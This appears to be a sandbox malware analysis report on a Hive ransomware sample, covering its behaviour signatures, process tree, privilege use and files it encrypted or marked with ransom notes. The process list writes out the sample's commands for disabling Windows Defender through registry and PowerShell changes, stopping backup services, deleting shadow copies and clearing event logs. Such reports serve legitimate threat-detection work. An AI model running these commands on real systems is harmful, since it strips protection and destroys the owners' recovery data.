Malware Analysis Report

2024-10-16 03:10

Sample ID 220113-ljd6dahaf9
Target 2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709
SHA256 2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709
Tags
evasion ransomware spyware stealer trojan hive
score
10/10


Analysis Overview

score
10/10

SHA256

2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709

Threat Level: Known bad

The file 2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709 was found to be: Known bad.

Malicious Activity Summary

evasion ransomware spyware stealer trojan hive

Modifies security service

Hive

Modifies Windows Defender Real-time Protection settings

Deletes Windows Defender Definitions

Deletes shadow copies

Clears Windows event logs

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Runs ping.exe

Runs net.exe

Modifies registry class

Opens file in notepad (likely ransom note)

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Interacts with shadow copies

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-13 09:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-13 09:33

Reported

2022-01-13 09:38

Platform

win7-en-20211208

Max time kernel

77s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory


Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1684 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1300 wrote to memory of 320 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1684 wrote to memory of 672 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 672 wrote to memory of 1256 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1684 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1016 wrote to memory of 1676 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1684 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1668 wrote to memory of 912 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1684 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1960 wrote to memory of 1520 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1684 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1916 wrote to memory of 904 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1684 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 956 wrote to memory of 1212 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1684 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1820 wrote to memory of 1120 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe

"C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 1a9a7e46dcbe23ba2a08cdf7988f0364
SHA1 6a67cf6db4dc9e62148b00370370925d37688dbc
SHA256 1532737b72c2e42af33f063a7bcc4281344af8149dea138dd5f94e28270aa662
SHA512 b1ecd502147e91f58f2ba76e0dcb9391e73e4b3ba5da021a6960a165b30de47af04fef2f475135d23792aa0d104a146d0d71a630f5331ab407edb22070567a46

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-13 09:33

Reported

2022-01-13 09:38

Platform

win10-en-20211208

Max time kernel

167s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_dApl8Hq1txo0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_eHCp5trpU940.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_MAK_AE-ul-phn.xrm-ms.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_W8njOOQxmck0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\SetStart.m4a.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_8ARPioWK2eY0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Catalog\chess.3mf C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\bg6_thumb.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad.xml C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LAYERS\THMBNAIL.PNG.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_2mm_A7gTCvE0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\5px.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\mask\11c.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Place\WideTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\UZEP_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Retail-ul-oob.xrm-ms.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_edmT7npB6cQ0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Grace-ppd.xrm-ms.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_VkxrP7ZZ27g0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Workflow\Icon_Quality.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-80_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.DailyChallenges\Assets\Popups\PerfectEarned.jpg C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordVL_MAK-ul-oob.xrm-ms.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_50StK8FqG3s0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemeCreation\Edit.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Tiles\pyramid.jpg C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\en-gb\UZEP_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Images\Ratings\Yelp10.scale-125.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Google.scale-150.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_B4fV07mzxCg0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-api-search.jar.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_UOvNbNwq5o80.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-80.png.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_qkwP53lpx2o0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\9724_32x32x32.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\css\main-selector.css.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_n9a3hJdIgoY0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\UZEP_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\UZEP_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Blue Warm.xml.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_j2HElbCr5SM0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\root\ui-strings.js.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_Iaz-9TRol3I0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ja-jp\ui-strings.js.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_9sIhJ0140r00.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ca-es\UZEP_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe.manifest.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_1Al0WQGMmg40.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-200_8wekyb3d8bbwe\AppxBlockMap.xml C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_oGPL38MByOE0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
